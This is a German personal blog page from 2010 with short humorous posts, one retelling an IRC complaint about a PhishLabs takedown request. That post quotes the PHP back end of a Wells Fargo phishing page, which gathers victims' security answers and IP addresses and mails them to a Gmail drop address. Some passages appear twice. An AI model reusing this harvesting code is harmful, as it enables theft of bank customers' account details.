Pixies
Geschrieben in
Vermischtes
Freitag, 26. Februar 2010
Mein persönlicher Gruß an W., F. und N.:
Because PXE booting is hard!
Because PXE booting is hard!
Verrückt...
Geschrieben in
Vermischtes
Donnerstag, 18. Februar 2010
Wer sich immer schon gewundert hat, was Posthamster (egal, wieviele Hüte sie tragen), den ganzen Tag lang so erleben:
Und das hier war die erwähnte Mail:
Leute, seid dankbar, wenn Eure Mails einfach nur ankommen. Ihr wisst gar nicht zu schätzen, was andere dafür tun müssen!
QUOTE:
19:45 < adaptr> I have a story
19:46 < adaptr> early this morning, I got a corporate email from some guy named "John" at phishlabs.com. yes, srsly.
19:47 < adaptr> in it, he told me he had uncovered a bank phishing site in which the phishing script contained a mail destination on one of our corporate domains. he asked me to disable the email account because, well, it wuz badd
19:48 < adaptr> he included about 25 lines of PHP with one recipient a gmail address, and another the same localpart at our domain
19:49 < adaptr> I mailed him back stating, simply, that A. I had no idea who he was, or where the PHP script came from, since he didn't bother to tell me. Also, B. how am I supposed to control whatever email address ANYBODY puts ANYWHERE ?
19:50 < adaptr> I further divulged that this is a business domain without user mailboxes, and that address did not exist
19:50 < adaptr> which he could have ascertained himslef within 5 seconds by SENDING A MAIL TO IT
19:50 < adaptr> which he didn't
19:50 < adaptr> I though: there, chew on that
19:50 < adaptr> a few hours later, HE CALLS ME
19:51 < adaptr> a real, live, direct, human phone call, from Maryland to .NL
19:51 < adaptr> he asked if I could help him by disabling that email address, becuz he wus ph33red of the bad phishermen
19:52 < adaptr> I had to explain to him, again, that A. this is not a mailbox, B. whatever email people send to our domains is none of his business, and C. if he has the PHP code, he can shut down the web site and the problem is over
19:53 < adaptr> he responded that he already had shutdown the web siye, but well, yada yada still ph33r and would I help him ?
19:53 < adaptr> I said if he wanted anything from our domain, he could produce papers, such as warrants or court orders, and we'd be happy to oblige
19:53 < adaptr> otherwise, nothing doing, noob
19:54 < adaptr> then came the kicker: remember that this was a business call, from "John" to me as a representative of the firm I work for
19:55 < adaptr> he had figured out by now that I was not going to indulge his fantasies, so he started off: what would YOUR FAMILY, who are surely also a victim of phishing, yada yada
19:55 < adaptr> I exploded at him
19:55 < adaptr> I said you are bringing personal matters into a business issue ? take your shit up with our legal department, if you have any, and gfy
19:55 < adaptr> he understood my tone and hung up
19:56 < adaptr> unbelievable
19:56 < adaptr> phishlabs.com
19:56 < cite> adaptr: May I blog that little story?
19:56 < adaptr> a one-person "security expert" site
19:56 < adaptr> with about 100 hits a day
19:56 < adaptr> cite: go wild
19:57 < cite> adaptr: Thanks. [...]
19:57 < adaptr> cite: don't forget to mention he claimed to be acting on behalf of Wells Fargo
19:46 < adaptr> early this morning, I got a corporate email from some guy named "John" at phishlabs.com. yes, srsly.
19:47 < adaptr> in it, he told me he had uncovered a bank phishing site in which the phishing script contained a mail destination on one of our corporate domains. he asked me to disable the email account because, well, it wuz badd
19:48 < adaptr> he included about 25 lines of PHP with one recipient a gmail address, and another the same localpart at our domain
19:49 < adaptr> I mailed him back stating, simply, that A. I had no idea who he was, or where the PHP script came from, since he didn't bother to tell me. Also, B. how am I supposed to control whatever email address ANYBODY puts ANYWHERE ?
19:50 < adaptr> I further divulged that this is a business domain without user mailboxes, and that address did not exist
19:50 < adaptr> which he could have ascertained himslef within 5 seconds by SENDING A MAIL TO IT
19:50 < adaptr> which he didn't
19:50 < adaptr> I though: there, chew on that
19:50 < adaptr> a few hours later, HE CALLS ME
19:51 < adaptr> a real, live, direct, human phone call, from Maryland to .NL
19:51 < adaptr> he asked if I could help him by disabling that email address, becuz he wus ph33red of the bad phishermen
19:52 < adaptr> I had to explain to him, again, that A. this is not a mailbox, B. whatever email people send to our domains is none of his business, and C. if he has the PHP code, he can shut down the web site and the problem is over
19:53 < adaptr> he responded that he already had shutdown the web siye, but well, yada yada still ph33r and would I help him ?
19:53 < adaptr> I said if he wanted anything from our domain, he could produce papers, such as warrants or court orders, and we'd be happy to oblige
19:53 < adaptr> otherwise, nothing doing, noob
19:54 < adaptr> then came the kicker: remember that this was a business call, from "John" to me as a representative of the firm I work for
19:55 < adaptr> he had figured out by now that I was not going to indulge his fantasies, so he started off: what would YOUR FAMILY, who are surely also a victim of phishing, yada yada
19:55 < adaptr> I exploded at him
19:55 < adaptr> I said you are bringing personal matters into a business issue ? take your shit up with our legal department, if you have any, and gfy
19:55 < adaptr> he understood my tone and hung up
19:56 < adaptr> unbelievable
19:56 < adaptr> phishlabs.com
19:56 < cite> adaptr: May I blog that little story?
19:56 < adaptr> a one-person "security expert" site
19:56 < adaptr> with about 100 hits a day
19:56 < adaptr> cite: go wild
19:57 < cite> adaptr: Thanks. [...]
19:57 < adaptr> cite: don't forget to mention he claimed to be acting on behalf of Wells Fargo
Und das hier war die erwähnte Mail:
CODE:
From: PhishLabs Security Operations [mailto:soc@phishlabs.com]
Sent: do 2010-02-18 04:04
To: support@*****; abuse@*****
CC: casetracker@phishlabs.com
Subject: [PL-****] Please suspend email address for phishing -
Hello,
Our company investigates computer crimes.
We have determined that one of your customers email accounts is being used to receive stolen data from a bank scam.
A fake bank web page (phishing) is set up and programmed to send victim bank info to housefly23@*******.
We are requesting that you suspend the email account housefly23@*******.
Also, please send us any details of the user and the messages which may contain bank details.
We will return this information to our customer, Wells Fargo bank.
Thank you,
John
Phish Site PHP Code
<?php
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$question1 = $HTTP_POST_VARS["question1"];
$answer1 = $HTTP_POST_VARS["answer1"];
$question2 = $HTTP_POST_VARS["question2"];
$answer2 = $HTTP_POST_VARS["answer2"];
$question3 = $HTTP_POST_VARS["question3"];
$answer3 = $HTTP_POST_VARS["answer3"];
$mesaj = "Wellsfargo Result 3:
question1 : $question1
answer1 : $answer1
question2 : $question2
answer2 : $answer2
question3 : $question3
answer3 : $answer3
---------------Created By CADOTUNJI------------------------------
IP : $ip
DATE : $datamasii
";
$recipient = "housefly23@gmail.com,housefly23@*******";
$subject = "Wellsfargo Result 3:";
mail($recipient,$subject,$mesaj);
header("Location: verify.php");
?>
Leute, seid dankbar, wenn Eure Mails einfach nur ankommen. Ihr wisst gar nicht zu schätzen, was andere dafür tun müssen!
Hoppla...
Geschrieben in
Vermischtes
Donnerstag, 18. Februar 2010
QUOTE:
17:44 <@fronti> da geht man gedankenversunken um die ecke am s-bahnhof und stösst mit einem zusammen.
17:44 <@fronti> reflexartig sagt man, "entschuldigung, hab sie nicht gesehen"
17:44 <@fronti> und dann war das nen blinder mit dem ich zusammengestossen bin
17:44 <@fronti> reflexartig sagt man, "entschuldigung, hab sie nicht gesehen"
17:44 <@fronti> und dann war das nen blinder mit dem ich zusammengestossen bin
Keine Panik. Passiert bestimmt jeden Tag. Gibt ja genug Leute, die „keine Augen im Kopf” haben
Evakuierung
Geschrieben in
Vermischtes
Montag, 8. Februar 2010
Anruf bei der Hotline eines großen Herstellers von Sicherheitslösungen. Durch die Menüauswahl durch, darauf gewartet, einen Sales-Agent sprechen zu können. Und dann folgende Bandansage:
Da ist bestimmt wieder Terror-Alarm
QUOTE:
We are sorry: Due to a *building evacuation*, there is no agent available to handle your call.
Da ist bestimmt wieder Terror-Alarm
